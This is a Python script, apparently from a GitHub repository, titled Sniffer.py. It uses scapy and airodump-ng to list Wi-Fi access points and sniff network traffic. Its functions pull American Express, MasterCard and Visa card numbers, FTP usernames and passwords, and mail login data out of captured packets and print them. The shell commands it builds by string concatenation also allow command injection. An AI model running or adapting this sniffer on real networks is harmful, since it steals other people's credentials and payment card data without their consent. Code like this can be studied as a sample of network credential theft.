-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathSniffer.py
81 lines (66 loc) · 2.39 KB
/
Sniffer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
from scapy.all import *
import AirDumpParser
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
T = '\033[93m' # tan
ast = '['+B+'*'+W+'] '
min = '['+R+'-'+W+'] '
plu = '['+G+'+'+W+'] '
ap_list = []
def ssidSniffer(pkt):
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype == 8:
if pkt.addr2 not in ap_list:
ap_list.append(pkt.addr2)
print "AP MAC: %s with SSID: %s " % (pkt.addr2, pkt.info)
def Airdump(interface, filename):
cmd = 'airodump-ng -w '+filename+' --output-format csv '+interface
try:
subprocess.check_output(cmd, shell=True)
except KeyboardInterrupt:
print B+'[INFO]'+W+' Stop Dumping'
pass
cmd = 'ls -t | grep '+filename+'| head -n 1'
file_result = subprocess.check_output(cmd, shell=True)
print B+'[INFO]'+W+' Analyzing results file: '+file_result
file_result = file_result.rstrip()
time.sleep(1) # take time before re-open output file
try:
AirDumpParser.csvParser(file_result)
except KeyboardInterrupt:
print(R+'[INFO]'+W+' Exiting to main menu')
return True
def sendibleDataSniff(pkt):
raw = pkt.sprintf('%Raw.load%')
americaRE = re.findall('3[47][0-9]{13}', raw)
masterRE = re.findall('5[1-5][0-9]{14}', raw)
visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw)
if americaRE:
print G+'[INFO]'+W+' Found American Express Card: ' + americaRE[0]
if masterRE:
print G+'[INFO]'+W+' Found MasterCard Card: ' + masterRE[0]
if visaRE:
print G+'[INFO]'+W+' Found Visa Card: ' + visaRE[0]
def ftpSniff(pkt):
dest = pkt.getlayer(IP).dst
raw = pkt.sprintf('%Raw.load%')
user = re.findall('(?i)USER (.*)', raw)
pswd = re.findall('(?i)PASS (.*)', raw)
if user:
print G+'[INFO]'+W+' Detected FTP Login to ' + str(dest)
print G+'[INFO]'+W+' User account: ' + str(user[0])
elif pswd:
print G+'[INFO]'+W+' Password: ' + str(pswd[0])
def mailSniff(pkt):
# check to make sure it has a data payload
if pkt[TCP].payload:
mailpkt = str(pkt[TCP].payload)
if 'user' in mailpkt.lower() or 'pass' in mailpkt.lower():
print G+'[INFO]'+W+' Server: %s' % pkt[IP].dst
print G+'[INFO]'+W+' Mail: %s' %pkt[TCP].payload